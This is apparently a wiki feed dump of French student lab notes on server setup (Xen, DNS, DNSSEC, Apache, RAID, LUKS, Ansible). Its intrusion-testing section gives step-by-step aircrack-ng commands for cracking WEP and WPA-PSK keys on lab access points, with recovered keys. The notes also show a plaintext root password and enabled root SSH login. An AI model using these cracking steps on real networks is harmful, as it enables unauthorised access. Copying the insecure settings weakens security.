 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n karmeliet.site-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;br /&gt;
&lt;br /&gt;
=Ferme de serveurs Web=&lt;br /&gt;
&lt;br /&gt;
==Ansible==&lt;br /&gt;
&lt;br /&gt;
Se connecter à notre VM pra-04&lt;br /&gt;
 xen console /etc/xen/pra-04.cfg&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/network/interfaces&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.104&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
On ping sur notre zabeth pour savoir s'il communique bien ensemble&lt;br /&gt;
 ping 172.26.145.58&lt;br /&gt;
&lt;br /&gt;
On clone le git sur la zabeth puis on travaille dans le dossier&lt;br /&gt;
 git clone https://github.com/thomas-maurice/polytech-asr-lab.git&lt;br /&gt;
&lt;br /&gt;
On génère sur la zabeth une clé ssh&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;selim.bensalem@polytech-lille.net&amp;quot; -P ''&lt;br /&gt;
&lt;br /&gt;
Sur la zabeth, on rajoute au fichier authorized_keys la clé ssh précédemment créée et sur la VM, on crée un fichier authorized_keys avec la même clé&lt;br /&gt;
&lt;br /&gt;
On ajoute un role ssh_key&lt;br /&gt;
 - name: &amp;quot;Deploy ssh_keys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: authorized_keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: '0600&lt;br /&gt;
&lt;br /&gt;
On crée une template pour copier tous les clés dans authorized_keys de la VM&lt;br /&gt;
  % for ssh_key in ssh_keys%}&lt;br /&gt;
 {{ssh_key[&amp;quot;key&amp;quot;]}}&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
On lance ansible&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
==Consult==&lt;br /&gt;
&lt;br /&gt;
on installe consult et un container docker&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Create group&amp;quot;&lt;br /&gt;
   group:&lt;br /&gt;
     name: consul&lt;br /&gt;
     gid: 666&lt;br /&gt;
 - name: &amp;quot;Create user&amp;quot;&lt;br /&gt;
   user:&lt;br /&gt;
     name: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
     uid: 666&lt;br /&gt;
 - name: &amp;quot;Create /etc/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /etc/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Create /var/lib/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /var/lib/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Client json&amp;quot;&lt;br /&gt;
   copy:&lt;br /&gt;
     src: consul.json&lt;br /&gt;
     dest: /etc/consul/consul.json&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Start consul with container&amp;quot;&lt;br /&gt;
   docker_container:&lt;br /&gt;
     name: dockerConsul&lt;br /&gt;
     image: bitnami/consul&lt;br /&gt;
     volumes:&lt;br /&gt;
       - /etc/consul&lt;br /&gt;
     network_mode: host&lt;br /&gt;
     user: consul&lt;br /&gt;
     groups:&lt;br /&gt;
       - consul&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58043</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58043"/>
				<updated>2022-01-12T13:20:13Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Consult */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
